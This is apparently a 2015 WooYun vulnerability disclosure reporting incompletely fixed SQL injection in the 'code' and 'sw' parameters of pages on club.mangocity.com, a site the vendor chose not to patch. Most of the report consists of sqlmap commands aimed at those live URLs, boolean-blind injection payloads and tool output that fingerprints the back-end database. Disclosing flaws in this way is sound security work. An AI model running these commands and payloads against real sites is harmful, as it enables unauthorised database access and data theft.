当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0146048

漏洞标题:芒果网某分站未修复完整导致依旧存在SQL注入(一处为OR类型注入)

相关厂商:芒果网

漏洞作者: 路人甲

提交时间:2015-10-12 12:00

修复时间:2015-10-17 12:02

公开时间:2015-10-17 12:02

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-12: 细节已通知厂商并且等待厂商处理中
2015-10-17: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

两个参数需要继续过滤!~~~

详细说明:

注入点一:(未成功的注入)

http://club.mangocity.com/comment/scenicspot/scenicindex.aspx?code=xiamen


之前测试时,发现修复不完整,依旧存在注入!~~~
如下

sqlmap.py -u "http://club.mangocity.com/comment/scenicspot/scenicindex.aspx?code=xiamen" --threads 10 --dbms "MySQL"


1.jpg


GET parameter 'code' is vulnerable. Do you want to keep testing the others (if a
ny)? [y/N] y
sqlmap identified the following injection points with a total of 69 HTTP(s) requ
ests:
---
Place: GET
Parameter: code
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: code=xiamen' AND 1236=1236 AND 'JgJI'='JgJI
---
[23:02:16] [INFO] testing MySQL
[23:02:32] [WARNING] the back-end DBMS is not MySQL
[23:02:32] [INFO] testing Oracle
[23:02:47] [WARNING] the back-end DBMS is not Oracle
[23:02:47] [INFO] testing PostgreSQL
[23:03:02] [WARNING] the back-end DBMS is not PostgreSQL
[23:03:02] [INFO] testing Microsoft SQL Server
[23:03:02] [INFO] confirming Microsoft SQL Server
[23:03:48] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000


但是最近来测试,发现不行了,注入还是存在的,需要绕过吧!~~~

sqlmap.py -u "http://club.mangocity.com/comment/scenicspot/scenicindex.aspx?code=xiamen" --threads 10 --dbms "MySQL" -p code --level 5 --risk 3 --technique BT


这样没有测试成功,能力有限也就没有继续绕过注入测试了。

1.jpg


sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: code
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: code=xiamen' AND 8251=8251 AND 'nHZR'='nHZR
---
[18:30:24] [WARNING] changes made by tampering scripts are not included in shown
payload content(s)
[18:30:24] [INFO] testing MySQL
[18:30:39] [WARNING] the back-end DBMS is not MySQL
[18:30:39] [CRITICAL] sqlmap was not able to fingerprint the back-end database m
anagement system. Support for this DBMS will be implemented at some point
[18:30:39] [WARNING] HTTP error codes detected during run:
503 (Service Unavailable) - 1 times


注入点二:

http://club.mangocity.com/act/toptraveller/show.aspx?type=1&sw=111111


sw参数修复未完全,依旧可以被注入
未添加--level 5 --risk 3测试结果,没法注入

sqlmap.py -u "http://club.mangocity.com/act/toptraveller/show.aspx?type=1&sw=111111" --threads 10 --dbms "Microsoft SQL Server" --level 5 --risk 3 -p sw


--level 1-1.jpg


[00:38:25] [INFO] testing connection to the target URL
[00:38:25] [INFO] testing if the target URL is stable. This can take a couple of
seconds
[00:38:26] [WARNING] target URL is not stable. sqlmap will base the page compari
son on a sequence matcher. If no dynamic nor injectable parameters are detected,
or in case of junk results, refer to user's manual paragraph 'Page comparison'
and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
[00:38:27] [INFO] testing if GET parameter 'type' is dynamic
[00:38:28] [WARNING] GET parameter 'type' does not appear dynamic
[00:38:43] [WARNING] heuristic (basic) test shows that GET parameter 'type' migh
t not be injectable
[00:38:43] [INFO] testing for SQL injection on GET parameter 'type'
[00:38:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:41:29] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[00:42:59] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[00:43:14] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[00:43:14] [CRITICAL] there is considerable lagging in connection response(s). P
lease use as high value for option '--time-sec' as possible (e.g. 10 or more)
[00:44:45] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[00:46:08] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[00:51:26] [INFO] target URL appears to be UNION injectable with 3 columns
injection not exploitable with NULL values. Do you want to try with a random int
eger value for option '--union-char'? [Y/n] y
[01:13:02] [WARNING] GET parameter 'type' is not injectable
[01:13:02] [INFO] testing if GET parameter 'sw' is dynamic
[01:13:02] [WARNING] GET parameter 'sw' does not appear dynamic
[01:13:02] [WARNING] heuristic (basic) test shows that GET parameter 'sw' might
not be injectable
[01:13:02] [INFO] testing for SQL injection on GET parameter 'sw'
[01:13:02] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:13:02] [WARNING] reflective value(s) found and filtering out
[01:13:34] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[01:14:05] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[01:14:05] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[01:15:26] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[01:16:47] [INFO] testing 'Generic UNION query (15) - 1 to 10 columns'
[01:16:50] [INFO] target URL appears to be UNION injectable with 2 columns
[01:16:53] [INFO] target URL appears to be UNION injectable with 5 columns
[01:20:42] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for current UNION query injection technique test
[01:21:49] [INFO] target URL appears to have 1 column in query
[01:22:49] [WARNING] GET parameter 'sw' is not injectable
[01:22:49] [CRITICAL] all tested parameters appear to be not injectable. Try to
increase '--level'/'--risk' values to perform more tests. Please retry with the
switch '--text-only' (along with --technique=BU) as this case looks like a perfe
ct candidate (low textual content along with inability of comparison engine to d
etect at least one dynamic parameter). Also, you can try to rerun by providing e
ither a valid value for option '--string' (or '--regexp')
[01:22:49] [WARNING] HTTP error codes detected during run:
503 (Service Unavailable) - 147 times


添加--level 5 --risk 3后测试结果如下图

sqlmap.py -u "http://club.mangocity.com/act/toptraveller/show.aspx?type=1&sw=111111" --threads 10 --dbms "Microsoft SQL Server" --level 5 --risk 3


--level 5-1.jpg


--level 5-2.jpg


--level 5-3.jpg


--level 5-4.jpg

漏洞证明:

--level 5-1.jpg


--level 5-2.jpg


--level 5-3.jpg


--level 5-4.jpg

修复方案:

继续过滤修复

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-10-17 12:02

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无